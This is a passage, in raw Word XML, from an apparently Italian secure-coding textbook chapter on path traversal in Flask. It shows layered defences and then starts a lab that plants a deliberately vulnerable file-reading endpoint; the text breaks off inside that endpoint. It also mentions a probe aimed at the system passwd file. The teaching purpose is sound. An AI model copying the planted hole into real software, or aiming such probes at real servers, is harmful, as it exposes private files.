          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nome_file</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send_file(percorso)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anche se qualcuno tenta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?fattura=passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(senza estensione PDF), viene bloccato.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="416"/>
    <w:bookmarkStart w:id="417" w:name="Xe13ff32d6b3c63fd475ecaa843db3ab10872d55"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difesa 3 —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">os.path.realpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con verifica del prefisso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le difese precedenti coprono il caso classico, ma esistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bypass sofisticati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Symbolic link che puntano fuori dalla cartella consentita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Caratteri Unicode strani interpretati diversamente da diversi filesystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Doppia codifica URL che bypassa filtri ingenui</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">definitiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dopo aver costruito il percorso, calcolarne il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">percorso reale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">assoluto (risolvendo tutti gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, i symlink, le normalizzazioni) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">verificare che inizi davvero con la cartella consentita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CARTELLA_FATTURE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.realpath(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/var/www/fatture"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ESTENSIONI_AMMESSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".pdf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/download"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> download():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.basename(request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fattura"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.splitext(nome_file)[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].lower()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> estensione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESTENSIONI_AMMESSE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso_proposto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.join(CARTELLA_FATTURE, nome_file)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    percorso_reale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.path.realpath(percorso_proposto)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verifica finale: il percorso reale deve essere DENTRO la cartella consentita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percorso_reale.startswith(CARTELLA_FATTURE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os.sep):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> send_file(percorso_reale)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tre controlli concentrici. Difesa in profondità classica.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="417"/>
    <w:bookmarkStart w:id="418" w:name="Xec7069aa95c7a87b90f2eaa87fa387ab6bbef8a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bonus difesa 4 — Filtro nella query del database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se i file sono associati a record nel database, non passare mai il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nome del file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dall’utente: passa l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ID del record</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e ricava il nome del file dal database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/download/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> download(fattura_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"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session:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/login"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT nome_file FROM fatture "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"WHERE id = ? AND utente_id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (fattura_id, session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchone()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riga:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        abort(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> send_file(os.path.join(CARTELLA_FATTURE, riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vantaggi: niente input utente nel percorso, controllo di autorizzazione integrato (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), nome file controllato dal sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Questa è la soluzione che dovresti preferire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando applicabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="418"/>
    <w:bookmarkEnd w:id="419"/>
    <w:bookmarkStart w:id="424" w:name="esempio-guidato-su-bancapiccola-mini"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="sec_10_3"/>
      <w:r>
        <w:t xml:space="preserve">10.3 Esempio guidato su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungiamo a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un endpoint vulnerabile a Path Traversal e poi correggiamo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="420" w:name="setup-vulnerabile"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea una sottocartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">documenti/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir documenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea due file di test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "Termini e condizioni di BancaPiccola..." &gt; documenti/termini.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "Privacy policy GDPR..."                  &gt; documenti/privacy.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">segreto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da non esporre, fuori dalla cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">documenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "Chiave segreta del CEO: SUPER-SEGRETO-123" &gt; segreto.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/leggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> leggi():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    nome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
